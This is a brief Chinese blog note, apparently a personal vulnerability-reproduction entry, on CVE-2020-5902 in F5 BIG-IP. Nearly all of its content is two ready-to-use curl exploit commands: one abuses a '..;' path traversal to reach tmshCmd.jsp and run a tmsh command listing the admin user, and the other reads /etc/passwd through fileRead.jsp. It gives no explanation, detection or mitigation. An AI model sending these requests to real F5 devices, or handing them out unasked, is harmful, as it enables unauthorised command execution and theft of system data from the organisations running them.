CVE-2020-5902 F5 BIG-IP 远程代码执行RCE - ⎝⎛CodingNote.cc ⎞⎠

CVE-2020-5902 F5 BIG-IP 远程代码执行RCE

2020 年 7 月 6 日
笔记
漏洞复现

cve-2020-5902 :

RCE:
curl -v -k ‘//[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin’

Read File:
curl -v -k ‘//[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd’

原文地址：
//twitter.com/x4ce/status/1279790599793545216

Tags: 漏洞复现

Previous post

性能测试之jmeter逻辑控制种类详解一

Next post

货币金融学（米什金）课程学习笔记